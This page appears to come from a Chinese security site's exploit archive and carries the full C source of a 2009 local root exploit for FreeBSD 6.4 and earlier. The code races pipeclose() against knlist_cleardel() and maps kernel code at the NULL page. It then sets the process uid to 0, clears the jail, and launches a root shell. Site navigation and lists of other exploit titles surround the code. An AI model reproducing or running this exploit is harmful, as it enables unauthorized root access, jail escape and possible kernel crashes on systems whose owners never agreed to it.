首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
FreeBSD 6.4 root shell exploit 0 day
来源:vfocus.net 作者:babcia 发布时间:2010-04-19  

#if 0
FreeBSD 6.4 and below are vulnerable to race condition between pipeclose() and
knlist_cleardel() resulting in NULL pointer dereference. The following code
exploits vulnerability to run code in kernel mode, giving root shell and
escaping from jail.
#endif

/* 29.08.2009, babcia padlina
* FreeBSD <= 6.4 pipeclose()/knlist_cleardel() race condition
*
* works only on multiprocessor systems
* gcc -o padlina2 padlina2.c -lpthread
*/

#define _KERNEL

#include <sys/types.h>
#include <stdio.h>
#include <unistd.h>
#include <sys/event.h>
#include <sys/timespec.h>
#include <pthread.h>
#include <fcntl.h>
#include <string.h>
#include <stdlib.h>
#include <sys/mman.h>
#include <sys/param.h>
#include <sys/linker.h>
#include <sys/proc.h>

int fd[2], kq;
struct kevent kev, ke[2];
struct timespec timeout;
volatile int gotroot = 0;

static void kernel_code(void) {
    struct thread *thread;
    gotroot = 1;
    asm(
        "movl %%fs:0, %0"
        : "=r"(thread)
    );
    thread->td_proc->p_ucred->cr_uid = 0;
    thread->td_proc->p_ucred->cr_prison = NULL;

    return;
}

static void code_end(void) {
    return;
}

void do_thread(void) {
    while (!gotroot) {
        if (pipe(fd) < 0)
            perror("pipe");
        memset(&kev, 0, sizeof(kev));
        EV_SET(&kev, fd[0], EVFILT_READ, EV_ADD | EV_CLEAR, 0, 0, NULL);
        EV_SET(&kev, fd[1], EVFILT_WRITE, EV_ADD | EV_CLEAR, 0, 0, NULL);

        if (kevent(kq, &kev, 2, &ke, 2, &timeout) < 0)
            perror("kevent");

        close(fd[0]);
        close(fd[1]);
    }

    return;
}

void do_thread2(void) {
    usleep(100);
    while(!gotroot) {
        close(fd[0]);
        close(fd[1]);
    }

    return;
}

int main(void) {
    int i;
    pthread_t pth, pth2;

    if (!getuid() || !geteuid()) {
        printf("already root.\n");
        exit(-1);
    }

    printf("BEWARE! this exploit isn't 100%% reliable. successful exploitation\n"
        "may cause kernel memory corruption leading to system crash.\n"
        "it is also possible, that exploit will hang and such process\n"
        "will be unkillable. hit enter if you want to continue.\n");

    getchar();

    /* safe landing place for 6.4-RELEASE - it protects us from page fault
       due to invalid read */

    if (mmap((void *)0x408b0000, 0x4000, PROT_READ | PROT_WRITE | PROT_EXEC, MAP_ANON | MAP_FIXED, -1, 0) < 0) {
        perror("mmap");
        exit(-1);
    }

    if (mmap(0, 0x1000, PROT_READ | PROT_WRITE | PROT_EXEC, MAP_ANON | MAP_FIXED, -1, 0) < 0) {
        perror("mmap");
        exit(-1);
    }

    memcpy(0, &kernel_code, &code_end - &kernel_code);

    if ((kq = kqueue()) < 0) {
        perror("kqueue");
        exit(-1);
    }

    pthread_create(&pth, NULL, (void *)do_thread, NULL);
    pthread_create(&pth2, NULL, (void *)do_thread2, NULL);

    timeout.tv_sec = 0;
    timeout.tv_nsec = 1;

    printf("waiting for root... it should take no more than few seconds.\n"
         "otherwise, run exploit again.\n");
    i = 0;

    while (!gotroot && i++ < 4000)
        usleep(100);

    setuid(0);

    if (getuid()) {
        printf("failed. on unpatched systems, the exploit will be unkillable from now. try again.\n");
        exit(-1);
    }

    execl("/bin/sh", "sh", NULL);

    return 0;
}


 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Oracle Financials R12 SQL inje
·Winamp 5.572 whatsnew.txt SEH
·phpBB modified by Przemo <= 1.
·Archive Searcher .zip Stack Ov
·MS10-006 SMB client-side bug p
·PHP 5.3.x DoS
·IBM BladeCenter Management Mod
·Apache OFBiz SQL Remote Execut
·Magneto Net Resource ActiveX v
·Apache OFBiz FULLADMIN Creator
·Magneto Net Resource ActiveX v
·Unauthenticated File-system Ac
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved